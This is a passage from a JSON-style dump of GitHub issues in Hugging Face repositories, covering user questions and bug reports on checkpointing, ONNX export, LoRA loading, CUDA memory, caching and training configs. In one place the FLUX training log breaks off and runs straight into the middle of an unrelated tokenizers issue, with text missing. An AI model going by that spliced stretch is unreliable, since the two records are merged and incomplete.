behavior\n\nI would like to know if it supports saving optimizer state and how to use it. 
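\r\n\r\nFor reference, here is the pattern I am asking about (a sketch only: I assume accelerator.save_state / load_state checkpoint the optimizer alongside the model, delegating to DeepSpeed's own checkpoint format under ZeRO-2, but please confirm):\r\n\r\n```python\r\nimport torch\r\nfrom accelerate import Accelerator\r\n\r\naccelerator = Accelerator()\r\nmodel = torch.nn.Linear(8, 8)\r\noptimizer = torch.optim.AdamW(model.parameters(), lr=1e-4)\r\nmodel, optimizer = accelerator.prepare(model, optimizer)\r\n\r\n# expected to write model, optimizer, scheduler and RNG state together\r\naccelerator.save_state(\"checkpoints/step_1000\")\r\n\r\n# and later, to resume:\r\naccelerator.load_state(\"checkpoints/step_1000\")\r\n```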
\r\n\r\nTHANKS\uff01", "url": "https://github.com/huggingface/accelerate/issues/3190", "state": "closed", "labels": [], "created_at": "2024-10-23T11:58:08Z", "updated_at": "2024-11-01T02:53:38Z", "user": "ITerydh" }, { "repo": "huggingface/diffusers", "number": 9750, "title": "Is it possible to provide img2img code for CogView3?", "body": "Is it possible to provide img2img code for CogView3?", "url": "https://github.com/huggingface/diffusers/issues/9750", "state": "open", "labels": [ "stale", "contributions-welcome" ], "created_at": "2024-10-23T07:40:38Z", "updated_at": "2024-12-20T15:04:01Z", "comments": 3, "user": "ChalvYongkang" }, { "repo": "huggingface/optimum", "number": 2076, "title": "Problem converting tinyllama to onnx model with optimum-cli", "body": "### System Info\n\n```shell\nmain branch newest\r\nlocal pip install\n```\n\n\n### Who can help?\n\n@michaelbenayoun\r\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\noptimum-cli export onnx --model /home/wangzhiqun/TinyLlama-1.1B-Chat-v1.0 --task text-generation --batch_size 1 --sequence_length 128 tinyllama_onnx_file\n\n### Expected behavior\n\nTo specify the batch_size and sequence_length, I use the following \"optimum-cli export onnx --model /home/wangzhiqun/TinyLlama-1.1B-Chat-v1.0 --task text-generation --batch_size 1 --sequence_length 128 tinyllama_onnx_file\". But the exported onnx model still holds the shape [batch_size, sequence_length]. How can I specify the fixed dimensions?", "url": "https://github.com/huggingface/optimum/issues/2076", "state": "open", "labels": [ "bug" ], "created_at": "2024-10-22T06:23:51Z", "updated_at": "2024-10-22T06:36:42Z", "comments": 0, "user": "hayyaw" }, { "repo": "huggingface/diffusers", "number": 9731, "title": "How to use Playground2.5 to train lora with own dataset to generate pictures of a specific style\uff1f", "body": "### Describe the bug\n\nHi,\r\n\r\nI have been working on training models using the same dataset as \"stabilityai/stable-diffusion-xl-base-1.0\" with the script examples/text_to_image/train_text_to_image_lora_sdxl.py, and I achieved quite promising results.\r\n\r\nNow, I am trying to further improve the performance by switching to Dreambooth. I am currently using playground2.5 with examples/dreambooth/train_dreambooth_lora_sdxl.py. 
However, after multiple parameter tuning attempts, the performance is still not as good as the SDXL base model.\r\n\r\nI am unsure what might be causing this.\n\n### Reproduction\n\n![image](https://github.com/user-attachments/assets/339a0e9b-de08-408d-a43a-495f86b5e1df)\r\n\n\n### Logs\n\n_No response_\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.14.0-284.25.1.el9_2.x86_64-x86_64-with-glibc2.17\r\n- Running on Google Colab?: No\r\n- Python version: 3.8.20\r\n- PyTorch version (GPU?): 2.2.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.2\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.1\r\n- PEFT version: 0.13.2\r\n- Bitsandbytes version: 0.44.1\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA H800, 81559 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9731", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-10-21T12:10:12Z", "updated_at": "2024-11-20T15:03:04Z", "user": "hjw-0909" }, { "repo": "huggingface/diffusers", "number": 9727, "title": "FLUX.1-dev dreambooth save problem trained on multigpu", "body": "### Describe the bug\n\nI tried to train flux using accelerate and deepspeed, but when using two L40s, the model could not be saved properly. What is the problem?\n\n### Reproduction\n\ntrain.sh:\r\naccelerate launch --config_file config.yaml train_flux.py \\\r\n --pretrained_model_name_or_path=\"./FLUX.1-dev\" \\\r\n --resolution=1024 \\\r\n --train_batch_size=1 \\\r\n --output_dir=\"output1\" \\\r\n --num_train_epochs=10 \\\r\n --checkpointing_steps=5 \\\r\n --validation_steps=500 \\\r\n --max_train_steps=40001 \\\r\n --learning_rate=4e-05 \\\r\n --seed=12345 \\\r\n --mixed_precision=\"fp16\" \\\r\n --revision=\"fp16\" \\\r\n --use_8bit_adam \\\r\n --gradient_accumulation_steps=1 \\\r\n --gradient_checkpointing \\\r\n --lr_scheduler=\"constant_with_warmup\" --lr_warmup_steps=2500 \\\r\n\r\nconfig.yaml:\r\ncompute_environment: LOCAL_MACHINE\r\ndebug: false\r\ndeepspeed_config:\r\n gradient_accumulation_steps: 1\r\n gradient_clipping: 1.0\r\n offload_optimizer_device: cpu\r\n offload_param_device: cpu\r\n zero3_init_flag: false\r\n zero_stage: 2\r\ndistributed_type: DEEPSPEED\r\ndowncast_bf16: 'no'\r\ngpu_ids: 0,1\r\nenable_cpu_affinity: false\r\nmachine_rank: 0\r\nmain_training_function: main\r\nmixed_precision: fp16\r\nnum_machines: 1\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\n\n### Logs\n\n```shell\nUsing /home/oppoer/.cache/torch_extensions/py310_cu117 as PyTorch extensions root...\r\nNo modifications detected for re-loaded extension module utils, skipping build step...\r\nLoading extension module utils...\r\nTime to load utils op: 0.00030350685119628906 seconds\r\n10/21/2024 02:58:18 - INFO - __main__ - ***** Running training *****\r\n10/21/2024 02:58:18 - INFO - __main__ - Num examples = 2109730\r\n10/21/2024 02:58:18 - INFO - __main__ - Num batches each epoch = 1054865\r\n10/21/2024 02:58:18 - INFO - __main__ - Num Epochs = 1\r\n10/21/2024 02:58:18 - INFO - __main__ - Instantaneous batch size per device = 1\r\n10/21/2024 02:58:18 - INFO - __main__ - Total train batch size (w. 
parallel, distributed & accumulation) = 2\r\n10/21/2024 02:58:18 - INFO - __main__ - Gradient Accumulation steps = 1\r\n10/21/2024 02:58:18 - INFO - __main__ - Total optimization steps = 40001\r\nSteps: 0%| | 0/40001 [00:00 byte value. So some characters get other representations, like for example the white space `U+0020` becomes `\u0120`.\r\n\r\nThe purpose is, by doing so, you end up with an initial alphabet of 256 tokens. These 256 tokens can then be merged together to represent any other token in the vocabulary. This results in smaller vocabularies, that won't ever need an \"unknown\" token.\r\n\r\n_Originally posted by @n1t0 in https://github.com/huggingface/tokenizers/issues/203#issuecomment-605105611_\r\n\r\n@n1t0\r\nThank you for your previous responses. I have been working with a large tokenizer of a LLM, and I've noticed that the vocabulary contains a significant amount of information that like these unreadable codes. \r\n\r\nI wonder if there are any methods or tools available to help me read and interpret the information in the tokenizer's vocabulary. For example, is there a way to map these tokens back to their original words or phrases, or any other approach to make the vocabulary more interpretable?\r\n ", "url": "https://github.com/huggingface/tokenizers/issues/1661", "state": "closed", "labels": [], "created_at": "2024-10-20T13:38:53Z", "updated_at": "2024-10-21T07:29:43Z", "user": "kaizhuanren" }, { "repo": "huggingface/diffusers", "number": 9719, "title": "`disable_progress_bar` is ignored for some models (Loading checkpoint shards)", "body": "### Describe the bug\n\nWhen loading some pipelines, `diffusers.utils.logging.disable_progress_bar()` doesn't disable all progress bars. In particular the \"Loading checkpoint shards\" progress bar still appears. The \"Loading pipeline components...\" progress bar, however, is disabled as expected. Models I found, where this occurs, are: \r\n\r\n* [`stabilityai/stable-diffusion-3-medium-diffusers`](https://huggingface.co/stabilityai/stable-diffusion-3-medium-diffusers)\r\n* [`black-forest-labs/FLUX.1-schnell`](https://huggingface.co/black-forest-labs/FLUX.1-schnell)\r\n\r\nThe image generation progress bar also doesn't respect this setting, but can be disabled with `pipe.set_progress_bar_config(disable=True)`. When files are downloaded, the progress bars are also not disabled. These two cases seem like they might be intentional. Are they?\r\n\r\nIs there better way to disable progress bars globally for diffusers? Can the \"Loading checkpoint shards\" progress bar be disabled specifically?\n\n### Reproduction\n\n```python\r\nimport diffusers\r\ndiffusers.utils.logging.disable_progress_bar()\r\n# pipe = diffusers.StableDiffusion3Pipeline.from_pretrained('stabilityai/stable-diffusion-3-medium-diffusers')\r\npipe = diffusers.FluxPipeline.from_pretrained('black-forest-labs/FLUX.1-schnell')\r\npipe('test')\r\n```\n\n### Logs\n\n```shell\n>>> pipe = diffusers.FluxPipeline.from_pretrained('black-forest-labs/FLUX.1-schnell')\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:03<00:00, 1.56s/it]\r\nYou set `add_prefix_space`. 
The tokenizer needs to be converted from the slow tokenizers\r\n>>>\n```\n\n\n### System Info\n\nGoogle Colab\r\n\r\nor locally:\r\n\r\n- \ud83e\udd17 Diffusers version: 0.30.3\r\n- Running on Google Colab?: No\r\n- Python version: 3.12.7\r\n- PyTorch version (GPU?): 2.5.0+cu124 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.0\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.1\r\n- PEFT version: not installed\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\n\n### Who can help?\n\n@sayakpaul @DN6", "url": "https://github.com/huggingface/diffusers/issues/9719", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-19T17:42:37Z", "updated_at": "2024-10-19T19:29:12Z", "comments": 2, "user": "JonasLoos" }, { "repo": "huggingface/optimum", "number": 2069, "title": "High CUDA Memory Usage in ONNX Runtime with Inconsistent Memory Release", "body": "### System Info\r\n\r\n```shell\r\nOptimum version: 1.22.0\r\nPlatform: Linux (Ubuntu 22.04.4 LTS)\r\nPython version: 3.12.2\r\nONNX Runtime Version: 1.19.2\r\nCUDA Version: 12.1\r\nCUDA Execution Provider: Yes (CUDA 12.1)\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@JingyaHuang @echarlaix \r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\n```python\r\ndef load_model(self, model_name):\r\n session_options = ort.SessionOptions()\r\n session_options.add_session_config_entry('cudnn_conv_use_max_workspace', '0')\r\n session_options.enable_mem_pattern = False\r\n session_options.arena_extend_strategy = \"kSameAsRequested\"\r\n session_options.gpu_mem_limit = 10 * 1024 * 1024 * 1024\r\n \r\n model = ORTModelForSeq2SeqLM.from_pretrained(model_name, provider=\"CUDAExecutionProvider\", session_options=session_options)\r\n tokenizer = AutoTokenizer.from_pretrained(model_name)\r\n return tokenizer, model\r\n\r\ndef inference(self, batch, doc_id='-1'):\r\n responses, status = '', False\r\n try:\r\n encodings = self.tokenizer(batch, padding=True, truncation=True, max_length=8192, return_tensors=\"pt\").to(self.device)\r\n with torch.no_grad():\r\n generated_ids = self.model.generate(\r\n encodings.input_ids,\r\n max_new_tokens=1024\r\n )\r\n responses = self.tokenizer.batch_decode(generated_ids, skip_special_tokens=True)\r\n status = True \r\n except Exception as e:\r\n logger.error(f\"Failed to do inference on LLM, error: {e}\")\r\n\r\n torch.cuda.empty_cache()\r\n return status, responses\r\n```\r\n\r\n### Expected behavior\r\n\r\nI expect the CUDA memory to decrease and be released after processing smaller inputs, optimizing memory usage for subsequent inputs.\r\n![Picture1](https://github.com/user-attachments/assets/a188ede0-2287-4603-a84e-ba62d309a940)\r\n\r\n", "url": "https://github.com/huggingface/optimum/issues/2069", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2024-10-19T02:45:54Z", "updated_at": "2024-12-25T02:02:08Z", "user": "niyathimariya" }, { "repo": "huggingface/transformers.js", "number": 981, "title": "Any gotcha's with manually adding items to transformers-cache?", "body": "### Question\r\n\r\nFor [papeg.ai](https://www.papeg.ai) I've implemented that 
the service worker caches `.wasm` files from `jsDelivr` that Transformers.js [wasn't caching itself yet](https://github.com/huggingface/transformers.js/issues/685#issuecomment-2325125036).\r\n\r\nI've been caching those files in the 'main' Papeg.ai cache until now, but I want to switch to saving those files in the `transformers-cache` instead. That would (hopefully) make it so that the .wasm files don't have to be downloaded again if I update papeg.ai (which clears the papeg.ai cache). And vice-versa: the transformers cache could be fully cleared independently of the papeg.ai cache (ideally Transformers.js would manage all this itself).\r\n\r\n- Is this a reasonable idea?\r\n- Is this in line with your plans for a future improved caching system? Or do you, for example, plan to keep wasm, onnx and config files in separate caches, like WebLLM?\r\n- Will Transformers.js even look for those .wasm files in `transformers-cache` first? With the service worker this doesn't technically matter, as requests to jsDelivr are captured anyway. But the service worker isn't always available.\r\n\r\nTangentially, would it be an idea to (also) store the code and wasm files on Hugging Face itself? Because of EU privacy regulations, and good privacy design in general, I'd like to keep the set of third parties that the site needs to connect to as small as possible. I'd love to eliminate jsDelivr and only rely on GitHub and Hugging Face. Or is there perhaps a way to tell Transformers.js where to look? Then I could host the files on GitHub/Hugging Face manually.\r\n\r\nJust for fun, here's a service worker code snippet that, from now on, stores the jsDelivr files in the transformers-cache:\r\n\r\n```\r\nlet target_cache = cacheName;\r\nif (request.url.indexOf('https://cdn.jsdelivr.net/npm/@huggingface/transformers') != -1) {\r\n  console.log(\"service_worker: saving to transformers-cache: \", request.url);\r\n  target_cache = 'transformers-cache';\r\n}\r\n\r\ncaches.open(target_cache)\r\n  .then(function(cache) {\r\n    cache.put(request, fetch_response_clone);\r\n  })\r\n  .catch((err) => {\r\n    console.error(\"service worker: caught error adding to cache: \", err);\r\n  })\r\n```\r\n", "url": "https://github.com/huggingface/transformers.js/issues/981", "state": "open", "labels": [ "question" ], "created_at": "2024-10-18T12:53:07Z", "updated_at": "2024-10-18T12:56:21Z", "user": "flatsiedatsie" }, { "repo": "huggingface/transformers", "number": 34241, "title": "How to output token by token using transformers?", "body": "### System Info\n\n...\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n...\n\n### Expected behavior\n\nHow can I output tokens one by one using transformers?", "url": "https://github.com/huggingface/transformers/issues/34241", "state": "closed", "labels": [ "Discussion", "bug" ], "created_at": "2024-10-18T09:45:19Z", "updated_at": "2024-11-26T08:04:43Z", "user": "xuanzhangyang" }, { "repo": "huggingface/lerobot", "number": 477, "title": "Collecting human operated datasets in simulation", "body": "Hello,\r\n\r\nCan you provide info on how human supervision was provided for the simulated datasets (e.g. `lerobot/aloha_sim_transfer_cube_human`)? 
I am starting to set up a similar MuJoCo gym environment for the Stretch (https://github.com/mmurray/gym-stretch) and I would like to collect/train on some human teleop data, but it seems like the current `control_robot.py` script and data collection examples are set up only for physical robots. Is there a branch somewhere with the code used to collect `lerobot/aloha_sim_transfer_cube_human` that I can reference?\r\n\r\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/477", "state": "closed", "labels": [ "question", "dataset", "simulation" ], "created_at": "2024-10-17T23:24:17Z", "updated_at": "2025-10-08T08:49:32Z", "user": "mmurray" }, { "repo": "huggingface/lighteval", "number": 365, "title": "[FT] Using lighteval to evaluate a model on a single sample, how?", "body": "Thank you to the team for the great work. I have a question. Can you please help me use lighteval to evaluate a model on a single sample? \r\n\r\nFor example, if I have an input I from MMLU and my model generates output O, how can I use lighteval to evaluate O using the Acc metric?\r\n\r\nThanks!", "url": "https://github.com/huggingface/lighteval/issues/365", "state": "closed", "labels": [ "feature" ], "created_at": "2024-10-17T12:43:45Z", "updated_at": "2024-10-24T10:12:54Z", "user": "dxlong2000" }, { "repo": "huggingface/diffusers", "number": 9700, "title": "Flux inversion", "body": "The current img2img does not work so well. [RF Inversion](https://rf-inversion.github.io/) provides an inversion method for Flux real-image editing; can we implement it using diffusers?\r\n\r\nOr how can we use DDIM inversion in Flux?", "url": "https://github.com/huggingface/diffusers/issues/9700", "state": "closed", "labels": [], "created_at": "2024-10-17T07:03:59Z", "updated_at": "2024-12-17T16:00:30Z", "comments": 8, "user": "yuxu915" }, { "repo": "huggingface/diffusers", "number": 9698, "title": "Unable to Retrieve Intermediate Gradients with CogVideoXPipeline", "body": "### Describe the bug\n\nWhen generating videos using the CogVideoXPipeline model, we need to access the gradients of intermediate tensors. However, we do not require additional training or parameter updates for the model.\r\n\r\nWe tried using register_forward_hook to capture the gradients, but this approach failed because the CogVideoXPipeline disables gradient calculations. 
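\r\n\r\nOne workaround we are considering (an untested sketch with illustrative, hypothetical shapes: skip the decorated pipeline __call__ entirely and run only the denoising transformer forward pass with gradients enabled):\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import CogVideoXPipeline\r\n\r\npipe = CogVideoXPipeline.from_pretrained(\"THUDM/CogVideoX-2b\", torch_dtype=torch.float16).to(\"cuda\")\r\n\r\n# hypothetical inputs; real latents/embeddings would be captured from a normal run\r\nlatents = torch.randn(1, 13, 16, 60, 90, dtype=torch.float16, device=\"cuda\", requires_grad=True)\r\nprompt_embeds = torch.randn(1, 226, 4096, dtype=torch.float16, device=\"cuda\")\r\ntimestep = torch.tensor([999], device=\"cuda\")\r\n\r\nnoise_pred = pipe.transformer(\r\n    hidden_states=latents,\r\n    encoder_hidden_states=prompt_embeds,\r\n    timestep=timestep,\r\n    return_dict=False,\r\n)[0]\r\nnoise_pred.float().sum().backward()\r\nprint(latents.grad.shape)  # gradients flow when the transformer is called directly\r\n```\r\n\r\n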
The root cause: in pipelines/cogvideo/pipeline_cogvideox.py at line 478, gradient tracking is turned off with @torch.no_grad().\r\n\r\nHow can we resolve this issue and retrieve the gradients without modifying the model\u2019s parameters or performing extra training?\r\n\n\n### Reproduction\n\nSample Code\r\npipe = CogVideoXPipeline.from_pretrained(\r\n    \"THUDM/CogVideoX-2b\",\r\n    torch_dtype=torch.float16\r\n)\r\nvideo = pipe(\r\n    prompt=prompt,\r\n    num_videos_per_prompt=1,\r\n    num_inference_steps=50,\r\n    num_frames=49,\r\n    guidance_scale=6,\r\n    generator=torch.Generator(device=\"cuda\").manual_seed(42),\r\n).frames[0]\r\n\r\nPipeline Code Reference \r\npipelines/cogvideo/pipeline_cogvideox.py at line 478\r\n@torch.no_grad()\r\n@replace_example_docstring(EXAMPLE_DOC_STRING)\r\ndef __call__(\r\n    self,\r\n    prompt: Optional[Union[str, List[str]]] = None,\r\n    negative_prompt: Optional[Union[str, List[str]]] = None,\r\n    height: int = 480,\r\n    width: int = 720,\n\n### Logs\n\n_No response_\n\n### System Info\n\nDiffusers version: 0.30.3\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9698", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-17T04:30:56Z", "updated_at": "2024-10-27T10:24:41Z", "comments": 4, "user": "lovelyczli" }, { "repo": "huggingface/diffusers", "number": 9697, "title": "train_text_to_image_sdxl training effect is very poor", "body": "I use DeepSpeed for training with train_text_to_image_sdxl.py:\r\n1. The dataset contains 231 images.\r\n2. DeepSpeed JSON:\r\n![\u4f01\u4e1a\u5fae\u4fe1\u622a\u56fe_17291359065532](https://github.com/user-attachments/assets/f82ad033-d786-4fe4-9264-3b6236304170)\r\n3. Training script:\r\n![\u4f01\u4e1a\u5fae\u4fe1\u622a\u56fe_17291362274700](https://github.com/user-attachments/assets/ae5a6207-dbc8-4dde-b5d7-dcdaa0ac2783)\r\n4. After training, using the training prompts again, the generated results are as follows:\r\n![\u4f01\u4e1a\u5fae\u4fe1\u622a\u56fe_17291363542986](https://github.com/user-attachments/assets/004d3e51-de2e-453b-864a-803794659d2c)\r\n\r\nMay I ask everyone, what is the reason for the poor generation quality?\r\n", "url": "https://github.com/huggingface/diffusers/issues/9697", "state": "closed", "labels": [], "created_at": "2024-10-17T03:40:17Z", "updated_at": "2024-10-17T08:32:44Z", "comments": 2, "user": "wzhiyuan2016" }, { "repo": "huggingface/finetrainers", "number": 41, "title": "cannot access local variable 'gradient_norm_before_clip' where it is not associated with a value", "body": "During both I2V and T2V training, I sometimes encountered the error \r\n\r\n```\r\n[rank1]: File \"/root/projects/cogvideox-factory/training/cogvideox_text_to_video_lora.py\", line 762, in main\r\n[rank1]: \"gradient_norm_before_clip\": gradient_norm_before_clip,\r\n[rank1]: ^^^^^^^^^^^^^^^^^^^^^^^^^\r\n[rank1]: UnboundLocalError: cannot access local variable 'gradient_norm_before_clip' where it is not associated with a value\r\n```\r\n\r\nThis is probably [here](https://github.com/a-r-r-o-w/cogvideox-factory/blob/a6c246c29d11d78e4aa3fb4b137c5ffd8d719d94/training/cogvideox_text_to_video_lora.py#L715) in the following code:\r\n```\r\nif accelerator.sync_gradients:\r\n    gradient_norm_before_clip = get_gradient_norm(transformer.parameters())\r\n    accelerator.clip_grad_norm_(transformer.parameters(), args.max_grad_norm)\r\n    gradient_norm_after_clip = get_gradient_norm(transformer.parameters())\r\n```\r\nSomehow `accelerator.sync_gradients` is false sometimes. \r\n\r\nIs there a quick fix? Is it only for logging?
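\r\n\r\nA possible quick fix (sketch): accelerator.sync_gradients is False on gradient-accumulation steps, so the norms are simply never computed there. Initializing the variables and logging them conditionally should avoid the UnboundLocalError, assuming they are only consumed for logging:\r\n```\r\ngradient_norm_before_clip, gradient_norm_after_clip = None, None\r\nif accelerator.sync_gradients:\r\n    gradient_norm_before_clip = get_gradient_norm(transformer.parameters())\r\n    accelerator.clip_grad_norm_(transformer.parameters(), args.max_grad_norm)\r\n    gradient_norm_after_clip = get_gradient_norm(transformer.parameters())\r\n\r\n# only log the norms on steps where they were actually computed\r\nlogs = {}\r\nif gradient_norm_before_clip is not None:\r\n    logs[\"gradient_norm_before_clip\"] = gradient_norm_before_clip\r\n    logs[\"gradient_norm_after_clip\"] = gradient_norm_after_clip\r\n```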
\r\n", "url": "https://github.com/huggingface/finetrainers/issues/41", "state": "closed", "labels": [], "created_at": "2024-10-16T18:34:19Z", "updated_at": "2024-12-06T08:09:46Z", "user": "Yuancheng-Xu" }, { "repo": "huggingface/finetrainers", "number": 40, "title": "How to load the fine-tuned I2V model's LoRA module", "body": "I have successfully fine-tuned an I2V model (locally, without pushing to HF) and would like to load it for inference. I use the following code suggested in the readme:\r\n\r\n```\r\nmodel_name = \"THUDM/CogVideoX-5b-I2V\" \r\npipe = CogVideoXImageToVideoPipeline.from_pretrained(\r\n    model_name, torch_dtype=torch.bfloat16\r\n).to(\"cuda\")\r\n\r\npipe.load_lora_weights(\"MyLocalLoRAPath\", adapter_name=[\"cogvideox-lora\"])\r\npipe.set_adapters([\"cogvideox-lora\"], [1.0])\r\n```\r\n\r\nHowever, I encounter the error \r\n\r\n```\r\nFile ~/anaconda3/envs/cogvideox-i2v/lib/python3.11/site-packages/diffusers/loaders/lora_pipeline.py:2451, in CogVideoXLoraLoaderMixin.load_lora_into_transformer(cls, state_dict, transformer, adapter_name, _pipeline):\r\n\r\nif adapter_name in getattr(transformer, \"peft_config\", {}):\r\n    raise ValueError(\r\n        f\"Adapter name {adapter_name} already in use in the transformer - please select a new adapter name.\" )\r\n\r\nTypeError: unhashable type: 'list'\r\n```\r\n\r\nNote: in the trained LoRA folders, there is only a `pytorch_lora_weights.safetensors`", "url": "https://github.com/huggingface/finetrainers/issues/40", "state": "closed", "labels": [], "created_at": "2024-10-16T17:25:21Z", "updated_at": "2024-12-03T03:01:23Z", "user": "Yuancheng-Xu" }, { "repo": "huggingface/transformers.js", "number": 975, "title": "Supporting Multiple Pipelines?", "body": "### Question\n\nFirst of all, thank you so much for creating transformers.js! This is a fantastic library, and I had lots of fun building with it!\r\n\r\nI have a question regarding using the pipelines API: Would it be possible to start multiple pipelines? For example, instead of using just one pipeline to run inference, can we create a pool of pipelines and push jobs into this pool, to potentially better utilize the multiple cores on modern laptops? \r\n\r\nThe goal here is really to understand if there are ways to utilize multiple cores. No worries if not! I just want to understand where the limits are.\r\n\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/975", "state": "closed", "labels": [ "question" ], "created_at": "2024-10-16T08:06:44Z", "updated_at": "2024-10-21T15:58:20Z", "user": "kelayamatoz" }, { "repo": "huggingface/chat-ui", "number": 1525, "title": "Standardize Chat Prompt Templates to Use Jinja Format", "body": "## Describe your feature request\r\n\r\nCurrently, the `chatPromptTemplate` for each model that can be set in env uses **Handlebars** format. However, the `chat_prompt` in the actual model's `tokenizer_config.json` uses **Jinja** format. This inconsistency is causing significant inconvenience. Since **Jinja** is widely used and preferred, it would be beneficial to standardize on **Jinja** format for both `chatPromptTemplate` and `chat_prompt`. This will improve consistency and ease of use for developers.\r\n\r\n## Screenshots (if relevant)\r\n\r\n## Implementation idea\r\n\r\nTo implement this change, the following steps can be taken:\r\n\r\n1. Update Codebase: Update the codebase to handle **Jinja** templates for `chatPromptTemplate`.\r\n\r\n2. 
Documentation: Update the documentation to reflect this change and provide examples of how to use **Jinja** templates.\r\n\r\n3. Testing: Thoroughly test the changes to ensure compatibility and that all existing templates work correctly with the new format.", "url": "https://github.com/huggingface/chat-ui/issues/1525", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-16T05:26:12Z", "updated_at": "2024-11-20T00:44:16Z", "comments": 8, "user": "calycekr" }, { "repo": "huggingface/alignment-handbook", "number": 201, "title": "Full parameter fine-tuning keeps consuming system RAM and lead to crash ", "body": "I am using alignment handbook to perform a full parameter fine-tuning of llama3 models with Deepspeed stage 2 on my own dataset which is relatively large (400k+ records). \r\nThe training was performed on a slurm cluster with two nodes (each has 4 H100 GPUs).\r\nI have noticed that during the training, the system memory utilization keeps increasing even though I set torch_empty_cache_steps=500. \r\nI wonder if there is something wrong with the HF trainer? Any suggestions how to fix/debug? \r\nThere is also a similar issue at https://github.com/huggingface/transformers/issues/30119\r\n\r\n- Below is the system ram usage report from wandb:\r\n\r\n![Screenshot 2024-10-15 at 10 41 49\u202fAM](https://github.com/user-attachments/assets/1201d5ad-26ee-4d15-81c1-9ef33128bba0)\r\n![Screenshot 2024-10-15 at 10 41 46\u202fAM](https://github.com/user-attachments/assets/200b887c-38bd-40f9-a160-e61c14c25870)\r\n![Screenshot 2024-10-15 at 10 41 43\u202fAM](https://github.com/user-attachments/assets/4fee96b4-fd08-4073-a17a-dd7d4cfd8e34)\r\n\r\n\r\n\r\n\r\n\r\n- my config:\r\n```yaml\r\n# Model arguments\r\nmodel_name_or_path: ~/models/Meta-Llama-3-8B\r\nmodel_revision: main\r\ntorch_dtype: bfloat16\r\nattn_implementation: flash_attention_2\r\n\r\n# Data training arguments\r\nchat_template: \"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{% set system_message = '### System Instruction: ' + messages[0]['content'] | trim + '' %}{% set messages = messages[1:] %}{% else %}{% set system_message = '' %}{% endif %}{{ bos_token + system_message }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '### Context: ' + message['content'] | trim + '' }}{% elif message['role'] == 'assistant' %}{{ '### Result: ' + message['content'] | trim + ' ' + eos_token }}{% endif %}{% endfor %}{% if add_generation_prompt %}{{ '### Result: ' }}{% endif %}\"\r\ndataset_mixer:\r\n ~/data/processed_data_open_sourced_xml_to_text/merged_open_sourced_xml_to_text_dataset: 1.0\r\ndataset_splits:\r\n- train_sft\r\n- test_sft\r\npreprocessing_num_workers: 4\r\ndataloader_num_workers: 2\r\n\r\n# SFT trainer config\r\nbf16: true\r\ndo_eval: true\r\n# evaluation_strategy: epoch\r\neval_strategy: epoch\r\nmax_grad_norm: 1.0\r\n# gradient_accumulation_steps: 16\r\ngradient_checkpointing: true\r\ngradient_checkpointing_kwargs:\r\n use_reentrant: False\r\nlog_level: info\r\nlogging_steps: 5\r\nlogging_strategy: steps\r\nlearning_rate: 2.0e-05\r\nlr_scheduler_type: cosine_with_min_lr # cosine_with_min_lr\r\nlr_scheduler_kwargs:\r\n min_lr: 5e-6\r\noptim: adamw_torch # adamw_torch paged_adamw_32bit galore_adamw lion_32bit\r\noptim_target_modules: all-linear\r\nweight_decay: 0.01\r\nmax_seq_length: 12800\r\npacking: false\r\ndataset_num_proc: 
